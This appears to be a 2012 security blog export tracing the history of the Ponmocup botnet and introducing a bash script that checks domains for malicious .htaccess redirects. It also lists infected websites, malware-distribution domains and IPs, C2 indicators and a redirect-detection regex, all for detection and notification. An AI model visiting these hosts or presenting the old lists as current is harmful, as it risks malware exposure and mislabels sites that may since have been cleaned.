I heard a <a href="https://twitter.com/holisticinfosec/status/217500189219491840" target="_blank">rumor</a> that CIF will be covered this month in <a href="http://holisticinfosec.org/toolsmith.htm" target="_blank">Russ McRee's toolsmith</a>, which is always a great resource, too.<br />
<br />
If you know other good resources alike please let me know.<br />
<br />
Thanks for reading...<br />
<br />
@c_APT_ure<br />
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-42948579705826675012012-06-27T15:08:00.001-07:002012-08-12T16:47:40.448-07:00History of Ponmocup Malware / BotnetThis is a history of some events and publications about the Ponmocup malware or botnet.<br />
(work in progress -- will get updated eventually)<br />
<br />
There are many aliases from different A/V vendors as previously mentioned on my blog<br />
(<a href="http://www.threatexpert.com/threats/trojandownloader-win32-ponmocup-a.html" target="_blank">Ponmocup</a>, <a href="http://www.threatexpert.com/report.aspx?md5=e60597691f8911c77078e58d63934be4" target="_blank">Pirminay</a>, Kryptik, <a href="http://www.threatexpert.com/threats/trojanspy-win32-swisyn-b.html" target="_blank">Swisyn</a>, <a href="http://www.threatexpert.com/threats/adware-vundo-v-gen.html" target="_blank">Vundo</a>, <a href="http://www.threatexpert.com/threats/trojan-win32-monder.html" target="_blank">Monder</a>, <a href="http://www.threatexpert.com/threats/trojan-virtumonde.html" target="_blank">Virtumonde</a>/<a href="http://www.threatexpert.com/threats/adware-virtumondo.html" target="_blank">Virtumondo</a> etc.).<br />
The most often used lately is "<a href="http://www.symantec.com/security_response/writeup.jsp?docid=2010-071503-4247-99&tabid=2" target="_blank">Trojan Milicenso</a>" by Symantec, which has a <span style="background-color: yellow;">good blog post and detection description</span> about it..<br />
And it's been around at least since 2009, not just 2010 as mentioned in several places.<br />
<br />
<div style="color: #990000;">
Update 2012-08-13: there have been some more related posts published since my original post</div>
<div style="color: #990000;">
<br /></div>
<div style="color: #990000;">
2012-07-04: <span style="background-color: yellow;">Symantec blog</span> "<a href="http://www.symantec.com/connect/blogs/trojanmilicenso-infection-through-htaccess-redirection" target="_blank">Trojan.Milicenso: Infection through .htaccess Redirection</a>"</div>
<div style="color: #990000;">
2012-07-02: <span style="background-color: yellow;">Symantec blog</span> "<a href="http://www.symantec.com/connect/blogs/printer-madness-w32printlove-video" target="_blank">Printer Madness: W32.Printlove Video</a>"</div>
<br />
2012-06-25: ComputerWorld article "<a href="http://www.computerworld.com/s/article/9228464/Malware_infection_forces_printers_to_print_garbled_data_researchers_say" target="_blank">Malware infection forces printers to print garbled data</a>"<br />
2012-06-25: ITWorld "<a href="http://www.itworld.com/security/282265/printer-malware-wingdings-gone-wild" target="_blank">Printer malware – Wingdings gone wild</a>"<br />
<br />
2012-06-23: The Hacker News "<a href="http://thehackernews.com/2012/06/trojanmilicenso-print-bomb-printer.html" target="_blank">Trojan.Milicenso - Printer Trojan cause massive printing</a>"<br />
<br />
2012-06-22: ZDNet "<a href="http://www.zdnet.com/blog/security/thousands-of-office-printers-hit-by-gibberish-malware/12550" target="_blank">Thousands of office printers hit by 'gibberish' malware</a>"<br />
2012-06-22: Bloomberg Tech Blog "<a href="http://go.bloomberg.com/tech-blog/2012-06-22-when-hackers-fumble-printer-bomb-noisily-announces-attack/" target="_blank">When Hackers Fumble: ‘Printer Bomb’ Noisily Announces Attack</a>"<br />
2012-06-22: NET-Security "<a href="http://www.net-security.org/malware_news.php?id=2156" target="_blank">Trojan infection triggers massive printing jobs</a>" <br />
<br />
2012-06-21: ARStechnica "<a href="http://arstechnica.com/security/2012/06/printer-bomb-pandimonium/" target="_blank">Printer bomb malware wastes reams of paper, sparks pandemonium</a>"<br />
2012-06-21: SANS ISC diary "<a href="http://isc.sans.edu/diary.html?storyid=13519" target="_blank">Print Bomb? (Take 2)</a>"<br />
2012-06-21: <span style="background-color: yellow;">Symantec blog</span> "<a href="http://www.symantec.com/connect/blogs/trojanmilicenso-paper-salesman-s-dream-come-true" target="_blank">Trojan.Milicenso: A Paper Salesman’s Dream Come True</a>"<br />
<br />
2012-06-14: <span style="background-color: white;">Symantec KB article</span> "<a href="http://www.symantec.com/docs/TECH190982" target="_blank">Malware is causing network printers to print random ASCII characters</a>"<br />
<br />
2012-06-13: Mcafee Threat Advisory "<a href="https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/23000/PD23822/en_US/McAfee_Labs_Threat_Advisory_Vundo.pdf" target="_blank">Vundo</a>"<br />
<br />
2012-06-08: SANS ISC diary "<a href="https://isc.sans.edu/diary.html?storyid=13405" target="_blank">Print Bomb?</a>" (see also comments)<br />
2012-06-08: Symantec forum thread "<a href="http://www.symantec.com/connect/forums/print-server-gone-wild" target="_blank">Print server gone wild</a>"<br />
<br />
2012-06-07: McAfee community forum thread "<a href="https://community.mcafee.com/thread/45989?start=0&tstart=0" target="_blank">Printer Virus?</a>"<br />
<br />
2012-06-03: <b>c-APT-ure blog post</b> "<a href="http://c-apt-ure.blogspot.com/2012/06/introducing-ponmocup-finder.html" target="_blank">Introducing Ponmocup-Finder</a>"<br />
<br />
2012-05-16: Sophos detection "<a href="http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj%7EPonmocup-F/detailed-analysis.aspx" target="_blank">Troj/Ponmocup-F</a>"<br />
<br />
2012-04-27: <b>c-APT-ure blog post</b> "<a href="http://c-apt-ure.blogspot.com/2012/04/hunting-ponmocup-botnet.html" target="_blank">Hunting Ponmocup Botnet</a>"<br />
<br />
2012-04-13: <b>Collection of my tweets on Storify</b> "<a href="http://storify.com/c_APT_ure/a-v-failed-for-ponmocup-malware" target="_blank">A/V failed for Ponmocup malware!?</a>"<br />
<br />
2012-04-08: <b>IOC on ForensicArtifacts.com</b> "<a href="http://ioc.forensicartifacts.com/2012/04/ponmocup-2/" target="_blank">Ponmocup IOC released</a>"<br />
<br />
2012-03-08: <b>c-APT-ure blog post</b> "<a href="http://c-apt-ure.blogspot.com/2012/03/ponmocup-lots-changed-but-not-all.html" target="_blank">Ponmocup, lots changed, but not all</a>"<br />
<br />
2012-02-20: <b>Ponmocup analysis page created</b> "<a href="http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html" target="_blank">Why so many diff A/V detections?</a>"<br />
<br />
2012-02-18: <b>c-APT-ure blog post</b> "<a href="http://c-apt-ure.blogspot.com/2012/02/not-apt-but-nasty-malware-ponmocup.html" target="_blank">Not APT, but nasty malware (Ponmocup botnet)</a>"<br />
<br />
2011-11-15: <b>Mandiant forum thread started</b> "<a href="https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet" target="_blank">IOC request for Ponmocup malware (botnet)</a>"<br />
<br />
2011-05-30: <b>created web page</b> "<a href="http://www9.dyndns-server.com:8080/pub/botnet-links.html" target="_blank">Collection of links related to the Ponmocup botnet</a>"<br />
<br />
2011-05-23: Abuse.ch blog "<a href="http://www.abuse.ch/?p=3294" target="_blank">How Big is Big? Some Botnet Statistics</a>"<br />
<br />
2011-04-22: TrendMicro detection "<a href="http://about-threats.trendmicro.com/Malware.aspx?language=us&name=TSPY_PIRMINAY.A" target="_blank">TSPY_PIRMINAY.A</a>"<br />
<br />
2011-04-21: Malware Survival "<a href="http://malwaresurvival.net/2011/04/21/media-site-pimping-malware/" target="_blank">Media Site Pimping Malware</a>"<br />
<br />
2011-04-20: Sophos detection "<a href="http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Mal%7EPonmocup-A/detailed-analysis.aspx" target="_blank">Mal/Ponmocup-A</a>" (detailed analysis of 3 samples)<br />
<br />
2010-12-06: SPAMfighter news: "<a href="http://www.spamfighter.com/News-15476-New-Trojan-Blocks-Access-To-Bittorrent-Websites-Webroot.htm" target="_blank">New Trojan Blocks Access To Bittorrent Websites: Webroot</a>"<br />
<br />
2010-11-25: Softpedia news "<a href="http://news.softpedia.com/news/The-Pirate-Bay-and-Mininova-Blocked-by-Mysterious-New-Trojan-168578.shtml" target="_blank">The Pirate Bay and Mininova Blocked by Mysterious New Trojan</a>"<br />
<br />
2010-11-24: Webroot blog "<a href="http://blog.webroot.com/2010/11/24/troublesome-trojan-trammels-torrent-sites/" target="_blank">Troublesome Trojan Trammels Torrent Sites</a>"<br />
<br />
2010-07-14: <span style="background-color: yellow;">Symantec detection created</span> "<a href="http://www.symantec.com/security_response/writeup.jsp?docid=2010-071503-4247-99&tabid=2" target="_blank">Trojan.Milicenso</a>"<br />
<br />
2010-06-04: Microsoft MPC Encyclopedia entry "<a href="http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDownloader%3AWin32%2FPonmocup.A&ThreatID=146443" target="_blank">TrojanDownloader:Win32/Ponmocup.A</a>"<br />
<br />
2010-03-19: Sophos detection "<a href="http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj%7EMdrop-CLC/detailed-analysis.aspx" target="_blank">Troj/Mdrop-CLC</a>"<br />
<br />
2009-12-30: Microsoft MPC Detection initially created "<a href="http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDropper%3AWin32%2FPonmocup.A" target="_blank">TrojanDropper:Win32/Ponmocup.A</a>"<br />
<br />
2009-11-22: Microsoft MPC Detection initially created "<a href="http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDownloader%3AWin32%2FPonmocup.A&ThreatID=146443" target="_blank">TrojanDownloader:Win32/Ponmocup.A</a>"<br />
<br />
Please report any broken (or obviously wrong) links, thanks.<br />
<br />
Feedback and questions are welcome!<br />
<br />
@c_APT_ure<br />
<br />TomUhttp://www.blogger.com/profile/16795133222461988201noreply@blogger.com0tag:blogger.com,1999:blog-4767199732858434539.post-45634565339875044332012-06-03T08:44:00.000-07:002013-06-01T07:11:09.766-07:00Introducing Ponmocup-Finder<div style="color: red;">
<span style="font-size: small;"><b><span style="font-family: Arial,Helvetica,sans-serif;">Update 2013-06-01:</span> </b></span><br />
Please also read my newer blog posts about Ponmocup:<br />
<ul>
<li><a href="http://c-apt-ure.blogspot.com/2013/05/ponmocup-hunter-sans-dfir-summit-2013.html" target="_blank">"Ponmocup Hunter" SANS DFIR Summit 2013</a></li>
<li><a href="http://c-apt-ure.blogspot.com/2012/06/history-of-ponmocup-malwarebotnet.html" target="_blank">History of Ponmocup Malware / Botnet</a></li>
</ul>
Ponmocup-Finder has evolved in a little "workflow" :-)<br />
<ol>
<li><a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-suspicious-domains-latest.txt" target="_blank">add new infected domains to the list</a></li>
<li><a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/run-ponmocup-finder-sh.txt" target="_blank">daily cronjob to run Ponmocup-Finder</a></li>
<li><a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-finder-sh.txt" target="_blank">latest Ponmocup-Finder script</a></li>
<li><a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-latest.txt" target="_blank">list of currently infected webservers</a></li>
<li><a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-history-uniq-infected-days.txt" target="_blank">history of all previously infected webservers</a></li>
<li>notification lists for <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-latest_CH-LI.txt" target="_blank">CH / LI</a> and <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-infected-domains-latest_DE.txt" target="_blank">DE</a> domains </li>
</ol>
If you can do notifications for any infected webservers, go ahead and feel free to let me know.<br />
<br />
It would be great to see some search engines (like Google, MS Bing etc.) to add checks for these infections to their spiders (need to change user-agents just for one request per site), since <a href="http://www.symantec.com/connect/blogs/trojanmilicenso-infection-through-htaccess-redirection" target="_blank">infections happen only through search engine redirects</a>.<br />
<br />
<b>Update 2012-10-18:</b><br />
Finally I updated the <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/ponmocup-finder/ponmocup-finder_v2.txt" target="_blank">ponmocup-finder script</a> as promised. I also managed to download a new infector and <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/analysis.txt" target="_blank">analyze the malware</a> in a VM. You can also just look at some <a href="http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/screenshots/" target="_blank">screenshots</a> of the analysis.<b></b><br />
And lastly here are some network indicators of C2:<br />
<br />
<pre><span style="color: black;"> intohave.com / 64.179.44.188 (DNS request only)
88.216.164.117</span></pre>
<br />
For more malicious domains and IPs you can download my malware feeds (also using <a href="http://code.google.com/p/collective-intelligence-framework/wiki/WhatisCIF" target="_blank">CIF</a>) here:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace; font-size: small;"><span style="color: black;"><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-domains.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-domains.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-ips.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-botnet-ips.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-domains.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-domains.txt</a><br /><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-ips.txt">http://security-research.dyndns.org/pub/malware-feeds/ponmocup-malware-ips.txt</a></span></span><b><br /></b><br />
<br />
<b>Update 2012-09-25:</b></div>
<span style="color: red;">The Ponmocup finder script needs some update / tweeking, since the redirection URL patterns changed massively again (</span><a href="http://security-research.dyndns.org/pub/malware-feeds/ponmocup-urls.txt" style="color: blue;" target="_blank">samples</a><span style="color: red;">). Instead of just checking for the two previously known URL patterns (</span><span style="color: blue; font-family: "Courier New",Courier,monospace;">"/url\?sa=|/cgi-bin/r.cgi\?p="</span><span style="color: red;">) it should check if the infected website domain appears in the URI parameters of the redirection URL. I will update the script on this post as soon as I find time.</span><br />
<br />
You may have recently read a lot of hype about Flame or SkyWiper "cyber weapon", the son (or big brother) of Stuxnet and Duqu, which was found on a few thousand systems in a limited number of countries for espionage. Interesting and somewhat impressive, but this post is not about any of this stuff.<br />
<br />
The Ponmocup malware and botnet is something totally different. A year ago the botnet was several million bots big (at least 4 million IPs, maybe a multiple thereof number of bots) [1]. And it does not target or discriminate against any specific country, so chances are likely bigger that you may find one of these bots in your network than a Flame infection.<br />
Please read my previous three posts about Ponmocup to get an idea of what it is and how it works.<br />
<br />
<br />
[1] <a href="http://c-apt-ure.blogspot.ch/2012/02/not-apt-but-nasty-malware-ponmocup.html" target="_blank">Not APT, but nasty malware (Ponmocup botnet)</a><br />
[2] <a href="http://c-apt-ure.blogspot.ch/2012/03/ponmocup-lots-changed-but-not-all.html" target="_blank">Ponmocup, lots changed, but not all</a><br />
[3] <a href="http://c-apt-ure.blogspot.com/2012/04/hunting-ponmocup-botnet.html" target="_blank">Hunting Ponmocup Botnet</a><br />
<br />
Just to clarify something first, this post is more about detecting hacked or infected web servers redirecting unsuspecting visitors to malware downloads than about detecting infected bots themself. For the latter see my request to researchers to find current C&C domains in [3].<br />
<br />
I don't know of any service including all 32 from <a href="http://urlvoid.com/">urlvoid.com</a> that detects these infected web servers.<br />
<br />
So I threw together this little shell script that takes a list of domains and checks each domain with a single request if it's infected and redirecting visitors to Ponmocup malware (see [2]).<br />
<br />
This script is aimed at registrars, ISPs, web hosters, GovCERTs, malware researchers, botnet hunters, or generally anyone who wants to find (and hopefully report) infected web servers and who has access to a large number of domains.<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
$ cat ponmocup-finder.sh<br />
#!/bin/bash<br />
echo "date started: `date`"<br />
cat $1 | \<br />
while read domain; do<br />
echo -ne "checking domain: $domain --> ";<br />
wget -Sv --tries=1 --connect-timeout=5 \</div>
<div style="font-family: "Courier New",Courier,monospace;">
--user-agent="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13" \</div>
<div style="font-family: "Courier New",Courier,monospace;">
--referer="http://www.google.ch/search?q=ponmocup+check" \</div>
<div style="font-family: "Courier New",Courier,monospace;">
http://${domain}/ -O ${domain}.out > ${domain}_wget.log 2>&1<br />
redir=`egrep -m 1 "Location: " ${domain}_wget.log`<br />
<span style="color: red;">## match=`echo $redir | egrep "(/url\?sa=|/cgi-bin/r.cgi\?p=)" | wc -l`</span><br />
<span style="color: red;"> match=`echo $redir | cut -d"?" -f2- | egrep "$domain" | wc -l` </span><br />
if [ $match -gt 0 ]<br />
then<br />
echo -ne "seems to be INFECTED: "<br />
echo -ne `echo $redir | cut -d" " -f2 | cut -d"?" -f1`<br />
egrep -m 2 "Resolving " ${domain}_wget.log | tail -1 | sed -e 's/Resolving/ --> DNS:/g'<br />
else<br />
echo "seems to be CLEAN"<br />
fi<br />
done<br />
echo "date finished: `date`"</div>
<br />
<br />
Now let's run this script with a list of 88 domains (known to have been previously infected)<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ ./ponmocup-finder.sh domains-1.txt | tee ponmocup-finder_domains-1.log</span><br />
<span style="font-family: "Courier New",Courier,monospace;">checking domain: aviationhumor.net --> seems to be INFECTED: http://philosophymercer.com/cgi-bin/r.cgi --> DNS: philosophymercer.com... 62.212.74.228<br />checking domain: bgs-architekten.com --> seems to be INFECTED: http://capitalinformer.com/cgi-bin/r.cgi --> DNS: capitalinformer.com... 82.98.86.165</span><br />
<span style="font-family: "Courier New",Courier,monospace;">... </span><br />
<span style="font-family: "Courier New",Courier,monospace;">checking domain: www.w-en-ve.nl --> seems to be INFECTED: http://reportedtechniques.org/cgi-bin/r.cgi --> DNS: reportedtechniques.org... 208.91.197.108 </span><br />
<br />
How long did it take to check these 88 domains? About 160 seconds<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
$ egrep "date " ponmocup-finder_domains-1.log<br />
date started: Sat Jun 2 18:33:08 CEST 2012<br />
date finished: Sat Jun 2 18:35:48 CEST 2012</div>
<br />
<br />
Let's separate the clean and infected domains and do some stats:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
$ egrep CLEAN ponmocup-finder_domains-1.log > ponmocup-finder_domains-1_CLEAN.log<br />
$ egrep INFECTED ponmocup-finder_domains-1.log > ponmocup-finder_domains-1_INFECTED.log</div>
<div style="font-family: "Courier New",Courier,monospace;">
$ wc -l ponmocup-finder_domains-1_*.log<br />
36 ponmocup-finder_domains-1_CLEAN.log<br />
<span style="background-color: yellow;">52 ponmocup-finder_domains-1_INFECTED.log</span><br />
88 total</div>
<br />
Let's look at the malware domains and IPs: (these are <b>not</b> C&C domains of infected clients)<br />
<br />
<span style="color: red;"><b>Important note:</b> some of the older, inactive domains appear to have been grabbed by some domain parking services. Thus not all domains and IPs below are used for malware distribution. I need to separate the good from the <span style="background-color: yellow;">bad and ugly</span> (later).</span><br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
$ cat ponmocup-finder_domains-1_INFECTED.log | cut -d":" -f5- | awk '{ print $2" "$1 }' | sort | uniq -c<br />
<div style="background-color: yellow;">
1 176.53.112.108 ceprez.recycling-computers-portland.com...</div>
<div style="background-color: yellow;">
1 178.211.33.202 49847.hotel-sarajevo.com...</div>
<div style="background-color: yellow;">
1 178.211.33.202 lerberg.belanyi.com...</div>
<div style="background-color: yellow;">
1 178.211.33.203 38831.learn2drive4free.com...</div>
<div style="background-color: yellow;">
1 178.211.33.203 45215.thomasyohannan.com...</div>
<div style="background-color: yellow;">
1 178.211.33.203 46722.azangelfish.com...</div>
<div style="background-color: yellow;">
1 178.211.33.205 vamped.wonderfulroofing.com...</div>
3 199.59.241.218 herocopter.com...<br />
3 199.59.241.218 indanetwall.net...<br />
1 199.59.241.218 infernomag.com...<br />
2 208.91.197.108 reportedtechniques.org...<br />
2 217.11.251.173 underbuild.net...<br />
6 62.212.74.224 lewisentitled.com...<br />
2 62.212.74.228 philosophymercer.com...<br />
1 69.43.161.177 trialworld.net...<br />
<div style="background-color: yellow;">
1 77.79.11.96 45531.3d-tablet.cc...</div>
<div style="background-color: yellow;">
1 77.79.11.96 45585.3d-tablet.cc...</div>
2 82.98.86.165 capitalinformer.com...<br />
1 8.5.1.34 jesusonlynet.org...<br />
<div style="background-color: yellow;">
1 91.207.4.51 41950.thepetserver.com...</div>
<div style="background-color: yellow;">
1 91.207.4.51 52984.pballgames.com...</div>
1 94.63.149.247 handsexual.com...<br />
<span style="color: red;"> 1 failed: 35803.finishline-fitness.co.uk...</span><br />
<span style="color: red;"> 1 failed: 43560.vicandbarbs.net...</span><br />
<span style="color: red;"> 1 failed: apartliberal.com...</span><br />
<span style="color: red;"> 4 failed: besidesdream.com...</span><br />
<span style="color: red;"> 2 failed: costslaid.com...</span><br />
<span style="color: red;"> 3 failed: dutytraditional.net...</span><br />
<span style="color: red;"> 1 failed: earlyanswered.com...</span><br />
<span style="color: red;"> 1 failed: interestingchapter.net...</span><br />
<span style="color: red;"> 1 failed: thousandmilitary.com...</span><br />
<span style="color: red;"> 1 failed: twiceseparate.com...</span><br />
<span style="color: red;"> 1 failed: watchingsquare.com...</span></div>
<br />
And here are just the IPs: <br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ cat ponmocup-finder_domains-1_INFECTED.log | cut -d":" -f5- | awk '{ print $2 }' | sort | uniq -c</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">1 176.53.112.108</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">2 178.211.33.202</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">3 178.211.33.203</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">1 178.211.33.205</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 7 199.59.241.218</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 2 208.91.197.108</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 2 217.11.251.173</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 6 62.212.74.224</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 2 62.212.74.228</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 1 69.43.161.177</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">2 77.79.11.96</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 2 82.98.86.165</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 1 8.5.1.34</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">2 91.207.4.51</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> 1 94.63.149.247</span><br />
<span style="color: red; font-family: "Courier New",Courier,monospace;"> 17 failed:</span><br />
<br />
And here's a list of all malware domains and IPs discovered: (numeric only subdomains replaced with "*")<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ cat ponmocup-finder_domains-1_INFECTED.log | cut -d":" -f5- | awk '{ print $2"\n"$1 }' | sed -e 's/[0-9][0-9][0-9][0-9][0-9]/\*/g' | sed -e 's/\.\.\.//g' | sort | uniq | egrep -v failed</span><br />
<span style="font-family: "Courier New",Courier,monospace;">176.53.112.108</span><br />
<span style="font-family: "Courier New",Courier,monospace;">178.211.33.202</span><br />
<span style="font-family: "Courier New",Courier,monospace;">178.211.33.203</span><br />
<span style="font-family: "Courier New",Courier,monospace;">178.211.33.205</span><br />
<span style="font-family: "Courier New",Courier,monospace;">199.59.241.218</span><br />
<span style="font-family: "Courier New",Courier,monospace;">208.91.197.108</span><br />
<span style="font-family: "Courier New",Courier,monospace;">217.11.251.173</span><br />
<span style="font-family: "Courier New",Courier,monospace;">62.212.74.224</span><br />
<span style="font-family: "Courier New",Courier,monospace;">62.212.74.228</span><br />
<span style="font-family: "Courier New",Courier,monospace;">69.43.161.177</span><br />
<span style="font-family: "Courier New",Courier,monospace;">77.79.11.96</span><br />
<span style="font-family: "Courier New",Courier,monospace;">82.98.86.165</span><br />
<span style="font-family: "Courier New",Courier,monospace;">8.5.1.34</span><br />
<span style="font-family: "Courier New",Courier,monospace;">91.207.4.51</span><br />
<span style="font-family: "Courier New",Courier,monospace;">94.63.149.247</span><br />
<span style="font-family: "Courier New",Courier,monospace;">*.3d-tablet.cc</span><br />
<div style="font-family: "Courier New",Courier,monospace;">
apartliberal.com<br />
*.azangelfish.com<br />
besidesdream.com<br />
capitalinformer.com<br />
ceprez.recycling-computers-portland.com<br />
costslaid.com<br />
dutytraditional.net<br />
earlyanswered.com<br />
*.finishline-fitness.co.uk<br />
handsexual.com<br />
herocopter.com<br />
*.hotel-sarajevo.com<br />
indanetwall.net<br />
infernomag.com<br />
interestingchapter.net<br />
jesusonlynet.org<br />
*.learn2drive4free.com<br />
lerberg.belanyi.com<br />
lewisentitled.com<br />
*.pballgames.com<br />
philosophymercer.com<br />
reportedtechniques.org<br />
*.thepetserver.com<br />
*.thomasyohannan.com<br />
thousandmilitary.com<br />
trialworld.net<br />
twiceseparate.com<br />
underbuild.net<br />
vamped.wonderfulroofing.com<br />
*.vicandbarbs.net<br />
watchingsquare.com</div>
<br />
And here's the list of infected domains (servers with malicious<span style="font-family: "Courier New",Courier,monospace;"> .htaccess </span>file)<br />
<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ cat ponmocup-finder_domains-1_INFECTED.log | awk '{ print $3 }' | sort | uniq</span><br />
<span style="font-family: "Courier New",Courier,monospace;">aviationhumor.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">bgs-architekten.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">cryptonaux.co.uk</span><br />
<span style="font-family: "Courier New",Courier,monospace;">europschool.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">flowerbouquetsforweddings.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">hellokittyfighters.de</span><br />
<span style="font-family: "Courier New",Courier,monospace;">insurancepersonalpropertyassessments.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">pippatoledoshop.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">rabita-ms.ch</span><br />
<span style="font-family: "Courier New",Courier,monospace;">schoenstefaschingskostueme.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.apollonreisen.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.armsnetafrica.org</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.artistas-americanos.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.autocamp-nordsee.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.aylar.no</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.babfinance.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.canadawideflowers.ca</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.chinchillazucht.eu</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.demton.hu</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.dynam-med.info</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.europschool.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.extremebusa.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.feliceapicella.it</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.ferienwohnung-hotels-kroatien.de</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.flowerbouquetsforweddings.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.football-session.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.forexonlinegeheimnisse.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.guatemala-tourisme.info</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.hexenkostueme.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.hillsidebeachclub.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.hotelanderoper.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.hypequest.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.jenniferhejna.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.krcgent.be</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.lotex24.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.lotusnaturalspa.ch</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.moebel-direkt.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.oceanview-house.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.pr-klartext.de</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.ps3-fifaliga.de</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.radiofreecuba.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.smelugano2.ch</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.stadtbredimus.lu</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.stublla.net</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.sudani.co.za</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.swisshelp.info</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.thehighheelstore.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.theleesonhotel.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.titan.vc</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.vdomil.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.voegelitherapie.com</span><br />
<span style="font-family: "Courier New",Courier,monospace;">www.w-en-ve.nl</span><br />
<br />
